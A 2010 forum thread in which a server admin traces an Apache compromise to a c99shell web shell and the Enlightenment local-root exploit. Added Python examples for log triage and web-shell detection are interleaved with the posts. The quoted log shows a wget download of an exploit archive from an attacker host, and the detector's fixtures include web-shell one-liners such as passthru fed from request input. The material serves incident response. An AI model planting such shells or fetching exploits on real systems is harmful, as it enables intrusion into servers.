linumik (Tux's lil' helper)
Posted: Mon Jul 19, 2010 1:43 am
Post subject: Got hacked through Apache with Enlightenment exploit
http://securityreason.com/exploitalert/7189
Is there a fix for this? How do I prevent that from happening again? I can't find any information and there was no security alert (I have emerge sending me notifications when there is a problem).
Anyway, I found this in the main log file, which is usually empty as I have per-site logs.
Code:
error: permission denied on key 'kernel.cap-bound'
error: permission denied on key 'kernel.cad_pid'
error: permission denied on key 'net.ipv4.route.flush'
error: permission denied on key 'net.ipv6.route.flush'
error: permission denied on key 'fs.binfmt_misc.register'
cat: /etc/issue.net: No such file or directory
cat: /etc/*-realise: No such file or directory
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
error: "kern.ostype" is an unknown key
which: no lcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ruby in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bzip in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no suidperl in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no kav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no nod32 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bdcored in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no uvscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no drwebd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no rkhunter in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no chkrootkit in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ipfw in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tripwire in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no shieldcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no portsentry in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no snort in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ossec in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no lidsadm in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tcplodg in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sxid in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logcheck in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logwatch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sysmask in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no zmbscap in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sawmill in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no wormscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ninja in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no get in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
--2010-07-18 06:08:20-- http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz
Resolving th3-0utl4ws.com... 178.21.112.247
Connecting to th3-0utl4ws.com|178.21.112.247|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 98102 (96K) [application/x-tar]
Saving to: `enlightenment.tgz'
0K .......... .......... .......... .......... .......... 52% 162K 0s
50K .......... .......... .......... .......... ..... 100% 423K=0.4s
2010-07-18 06:08:21 (230 KB/s) - `enlightenment.tgz' saved [98102/98102]
[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 08:21:01 2010] [notice] Apache configured -- resuming normal operations
[Sun Jul 18 08:21:54 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 20:42:46 2010] [notice] Apache configured -- resuming normal operations
And all I could find in the running processes was:
Code:
root 23600 1 0 06:09 ? 00:00:00 /bin/sh -i
userSite122 23618 23600 0 06:09 ? 00:00:01 [exploit] <defunct>
root 27312 23600 0 10:18 ? 00:00:00 ping www.maritime.edu
This doesn't look good at all. What's the best way to check the system for trojans? Or should I just reinstall it?
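The evidence in this post is enough to write a first triage check. What follows is an added example, not anything posted in the thread: it runs the three indicator families visible above (the sysctl permission errors, the "which: no <tool>" sweep for security software, and the wget banner for the exploit archive) over the quoted error-log lines, and applies a process-lineage rule to the quoted ps output. The sample lines are copied from the post with the PATH lists shortened; the tool list and the scoring thresholds are assumptions.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns matching the evidence quoted in the post. The
# "which: no <tool> in (...)" lines are what an automated post-exploitation
# script prints while checking for security tools; the sysctl errors come
# from dumping kernel settings as an unprivileged user; the wget banner
# records the download of the exploit archive.
WHICH_RE = re.compile(r"^which: no (\S+) in \(")
SYSCTL_RE = re.compile(r"^error: permission denied on key '([^']+)'")
WGET_RE = re.compile(r"^--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)")
# ps -ef columns: UID PID PPID C STIME TTY TIME CMD
PS_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+(\S+)\s+\S+\s+(.*)$")
SHELL_RE = re.compile(r"(^|/)(ba|da|k|z)?sh(\s|$)")

# Tools a compromise script typically checks for (assumed list, taken from
# the names in the posted log); probing several of them is itself an indicator.
SECURITY_TOOLS = {"rkhunter", "chkrootkit", "tripwire", "snort", "ossec",
                  "portsentry", "logcheck", "logwatch", "ipfw", "lidsadm", "sxid"}


@dataclass
class Findings:
    tools_probed: list = field(default_factory=list)
    sysctl_keys: list = field(default_factory=list)
    downloads: list = field(default_factory=list)  # (timestamp, url) pairs


def scan_error_log(lines):
    """Collect attacker-tool output that ended up in Apache's error log."""
    f = Findings()
    for line in lines:
        m = WHICH_RE.match(line)
        if m:
            f.tools_probed.append(m.group(1))
            continue
        m = SYSCTL_RE.match(line)
        if m:
            f.sysctl_keys.append(m.group(1))
            continue
        m = WGET_RE.match(line)
        if m:
            f.downloads.append((m.group(1), m.group(2)))
    return f


def is_post_exploitation(f):
    """True on a security-tool sweep or an out-of-band download. Apache never
    runs wget itself, so a single wget banner in its error log is decisive."""
    return len(set(f.tools_probed) & SECURITY_TOOLS) >= 3 or bool(f.downloads)


def suspicious_processes(ps_lines):
    """Flag root shells reparented to init and anything hanging off them."""
    procs = {}
    for line in ps_lines:
        m = PS_RE.match(line)
        if m:
            uid, pid, ppid, tty, cmd = m.groups()
            procs[int(pid)] = {"uid": uid, "pid": int(pid), "ppid": int(ppid),
                               "tty": tty, "cmd": cmd}
    # An interactive root shell with PPID 1 and no controlling terminal is not
    # something an administrator leaves behind; it is an exploit's payload.
    shells = {p["pid"] for p in procs.values()
              if p["uid"] == "root" and p["ppid"] == 1 and p["tty"] == "?"
              and SHELL_RE.search(p["cmd"])}
    flagged = []
    for p in procs.values():
        reasons = []
        if p["pid"] in shells:
            reasons.append("root interactive shell, PPID 1, no tty")
        if p["ppid"] in shells:
            reasons.append(f"spawned by suspicious root shell {p['ppid']}")
        parent = procs.get(p["ppid"])
        if parent and parent["uid"] == "root" and p["uid"] != "root":
            # A web-user process tied to a root parent means a privilege
            # boundary was crossed somewhere in this lineage.
            reasons.append(f"non-root child ({p['uid']}) of root process {parent['pid']}")
        if reasons:
            flagged.append((p["pid"], p["uid"], p["cmd"], reasons))
    return sorted(flagged)


# Lines copied from the post (error-log excerpt and ps output), PATH shortened.
SAMPLE_ERROR_LOG = """\
error: permission denied on key 'kernel.cap-bound'
error: permission denied on key 'net.ipv4.route.flush'
which: no rkhunter in (/bin:/sbin:/usr/bin)
which: no chkrootkit in (/bin:/sbin:/usr/bin)
which: no tripwire in (/bin:/sbin:/usr/bin)
which: no snort in (/bin:/sbin:/usr/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
--2010-07-18 06:08:20-- http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz
[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down
""".splitlines()

SAMPLE_PS = """\
root     23600     1  0 06:09 ?        00:00:00 /bin/sh -i
userSite122 23618 23600  0 06:09 ?        00:00:01 [exploit] <defunct>
root     27312 23600  0 10:18 ?        00:00:00 ping www.maritime.edu
""".splitlines()

if __name__ == "__main__":
    findings = scan_error_log(SAMPLE_ERROR_LOG)
    print("post-exploitation activity:", is_post_exploitation(findings), findings.downloads)
    for pid, uid, cmd, reasons in suspicious_processes(SAMPLE_PS):
        print(f"{pid:>6} {uid:<12} {cmd:<28} {'; '.join(reasons)}")
```

The download URL and timestamp the scanner extracts are the pivot for the next step: the first attacker action in the error log is 06:08:20, so the request that launched it has to sit in the access logs shortly before that.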
ppurka (Advocate)
Posted: Mon Jul 19, 2010 2:29 am
You should at least install rkhunter and chkrootkit and run them. In the long term, try to reinstall from scratch.
Hu (Administrator)
Posted: Mon Jul 19, 2010 4:22 am
The main payload may have been delivered in enlightenment.tgz, but some other problem allowed the attacker to execute enough code to download and use that payload. You need to find how the first attack got onto the system. It is the one that spammed your logs probing for various files and processes.
linumik (Tux's lil' helper)
Posted: Mon Jul 19, 2010 4:56 am
Hu wrote: "You need to find how the first attack got onto the system."
I can't find anything in any other logs. The only traces of the attack are in the apache-error.log that I posted. That's why I think it is some problem with Apache or maybe PHP. But I can't find anything unusual in any other logs, including the Apache logs for individual sites. I use a per-user Apache mod that might have an issue, too, but I can't find enough information to say for sure.
rkhunter didn't find any rootkits, but I guess I am still better off reinstalling the system. I just want to figure out what I need to close first, so I don't have to go through it again.
Anarcho (Advocate)
Posted: Mon Jul 19, 2010 2:15 pm
My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.
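Anarcho's suggestion, carried out as an added example that is not part of the thread: take the first attacker timestamp from the error log (the wget banner at 2010-07-18 06:08:20) and pull the access.log requests in a window around it, ranking POSTs and requests for PHP files that live under static-content directories, then repeated hits from one client. The access.log lines, the client addresses, the /images/.cache.php name and the list of static directories are all constructed for the example; the timestamp handling assumes both logs were written by the same server clock.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Apache combined log format.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Directories that should only ever serve static content on this server
# (an assumption about the layout); a .php file requested from one of them
# is the classic footprint of an uploaded web shell.
STATIC_DIRS = ("/images/", "/uploads/", "/tmp/", "/cache/", "/files/")

# First attacker timestamp visible in the posted error log (the wget banner).
EVENT_TIME = datetime(2010, 7, 18, 6, 8, 20)


def parse_access(line):
    m = ACCESS_RE.match(line)
    if not m:
        return None
    # Apache writes %t in server local time followed by a numeric offset; the
    # error log uses the same local clock without an offset, so the offset is
    # dropped and both are compared as naive local timestamps.
    ts = datetime.strptime(m.group("ts").split(" ")[0], "%d/%b/%Y:%H:%M:%S")
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": path, "query": query, "status": int(m.group("status"))}


def score(req):
    """Crude prior: POSTs to PHP files in static directories, with arguments."""
    s = 0
    if req["method"] == "POST":
        s += 2
    if req["path"].endswith(".php") and req["path"].startswith(STATIC_DIRS):
        s += 3
    if req["query"]:
        s += 1
    return s


def correlate(access_lines, event_time=EVENT_TIME,
              before=timedelta(minutes=10), after=timedelta(minutes=1)):
    """Return (score, request) pairs inside the window, best suspects first."""
    reqs = [r for r in map(parse_access, access_lines)
            if r and event_time - before <= r["ts"] <= event_time + after]
    per_ip = Counter(r["ip"] for r in reqs)
    ranked = []
    for r in reqs:
        s = score(r)
        if s and per_ip[r["ip"]] > 1:   # repeated suspicious hits from one client
            s += 1
        ranked.append((s, r))
    ranked.sort(key=lambda x: (-x[0], x[1]["ts"]))
    return ranked


def suspect_clients(ranked, threshold=5):
    """Client addresses whose best-scoring request reaches the threshold."""
    best = {}
    for s, r in ranked:
        best[r["ip"]] = max(best.get(r["ip"], 0), s)
    return sorted(ip for ip, s in best.items() if s >= threshold)


# Constructed access.log lines (not from the post); 203.0.113.7 plays the attacker.
SAMPLE_ACCESS_LOG = """\
192.0.2.5 - - [18/Jul/2010:05:30:00 +0200] "GET /index.php HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Jul/2010:06:07:55 +0200] "POST /images/.cache.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Jul/2010:06:08:02 +0200] "POST /images/.cache.php?act=cmd HTTP/1.1" 200 8802 "-" "Mozilla/4.0"
198.51.100.2 - - [18/Jul/2010:06:08:10 +0200] "GET /index.php HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
198.51.100.2 - - [18/Jul/2010:06:08:11 +0200] "GET /style.css HTTP/1.1" 200 900 "http://example.test/" "Mozilla/5.0"
203.0.113.7 - - [18/Jul/2010:06:08:19 +0200] "POST /images/.cache.php HTTP/1.1" 200 10240 "-" "Mozilla/4.0"
""".splitlines()

if __name__ == "__main__":
    ranked = correlate(SAMPLE_ACCESS_LOG)
    for s, r in ranked:
        print(f"{s:2} {r['ts']:%H:%M:%S} {r['ip']:<14} {r['method']:<4} {r['path']}?{r['query']}")
    print("suspect clients:", suspect_clients(ranked))
```

With per-site logs, run it over every site's access.log for the same window: the shell is only in one docroot, but the same client address turning up across several vhosts is what distinguishes the attacker from ordinary visitors.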
linumik (Tux's lil' helper)
Posted: Tue Jul 20, 2010 7:10 pm
Anarcho wrote: "My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log."
I found a script in one of the directories that is basically a c99shell PHP script that was used to gain access. I am trying to figure out how that script got there... The script doesn't work if safe_mode is on... which it wasn't. But with safe_mode many other scripts don't work either.
Anyway, about that enlightenment hack. Does anyone know if it is fixed in the latest kernel?
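Once a c99shell-style script is the known entry point, the remaining question is whether it is the only one. The following is an added example, not the thread's own code: it walks a document root for PHP files carrying common web-shell markers (eval over base64, exec functions fed straight from request parameters, the /e modifier of preg_replace, the c99/r57 family names) and reports anything changed since the incident, checking ctime as well as mtime because mtime is trivially reset with touch. The fixture docroot and the planted files are constructed for the example. Two caveats on the hardening side: safe_mode was deprecated in PHP 5.3 and removed in 5.4, so disable_functions and open_basedir are the per-site controls worth setting instead; and the archive was fetched from a path named localroot/xploits, a local privilege escalation, which only mattered because the web shell was already on disk, so the upload path is what to close first.

```python
import os
import re
import tempfile
from datetime import datetime

# Source patterns typical of PHP web shells (the c99/r57 families and generic
# one-liners). A hit is a lead for manual review, not proof on its own.
MARKERS = {
    "eval+base64": re.compile(r"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\("),
    "shell-family-name": re.compile(r"c99shell|r57shell|c99madshell", re.I),
    "exec-from-request": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*@?\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "preg_replace-e": re.compile(r"""preg_replace\s*\(\s*(['"])/.*?/[a-zA-Z]*e[a-zA-Z]*\1"""),
}
PHP_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5", ".inc")

# Day of the incident, from the posted logs.
INCIDENT = datetime(2010, 7, 18)


def scan_file(path):
    """Names of the markers found in one file (empty list if none or unreadable)."""
    try:
        with open(path, "rb") as fh:
            src = fh.read().decode("utf-8", errors="replace")
    except OSError:
        return []
    return [name for name, rx in MARKERS.items() if rx.search(src)]


def scan_docroot(root, since=INCIDENT):
    """Walk a document root; report PHP files with shell markers or recent changes."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTS):
                continue
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            # mtime is trivially forged with touch; ctime cannot be set from
            # userspace, so a recent ctime means a recent change whatever
            # the mtime claims.
            changed = datetime.fromtimestamp(max(st.st_mtime, st.st_ctime))
            markers = scan_file(full)
            if markers or changed >= since:
                hits.append({"path": os.path.relpath(full, root).replace(os.sep, "/"),
                             "markers": markers, "changed": changed})
    return sorted(hits, key=lambda h: (-len(h["markers"]), h["path"]))


def build_fixture():
    """Constructed docroot: one clean script and two planted look-alikes (not real samples)."""
    root = tempfile.mkdtemp(prefix="docroot-")
    files = {
        "index.php": "<?php echo 'hello'; ?>",
        "images/.cache.php": "<?php /* c99shell v.1.0 */ eval(gzinflate(base64_decode('H4sI'))); ?>",
        "uploads/x.php": "<?php @passthru($_GET['c']); preg_replace(\"/.*/e\", $_POST['p'], ''); ?>",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for h in scan_docroot(build_fixture()):
        print(f"{h['path']:<20} changed={h['changed']:%Y-%m-%d %H:%M} markers={h['markers']}")
```

Run it against a copy of the docroot taken before the reinstall, not the live one: the point is to learn which directory was writable to the web user and which upload or include path put the file there, which is what has to be fixed on the rebuilt system.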